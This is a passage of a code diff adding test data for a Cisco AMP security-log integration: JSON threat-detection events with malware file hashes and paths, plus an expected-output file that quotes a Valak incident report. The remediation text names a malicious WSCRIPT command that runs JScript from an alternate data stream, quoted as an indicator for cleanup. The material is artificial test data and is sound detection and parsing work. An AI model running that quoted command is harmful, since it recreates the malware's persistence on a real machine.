Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
new file mode 100644
index 00000000000..a4bddd0ecca
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
@@ -0,0 +1,3840 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-15T11:59:52.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Threat_Hunting"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Threat_Hunting",
+                "hostname": "Demo_Threat_Hunting"
+            },
+            "event": {
+                "severity": 4,
+                "action": "SecureX Threat Hunting Incident",
+                "ingested": "2021-09-12T17:31:04.469612451Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca 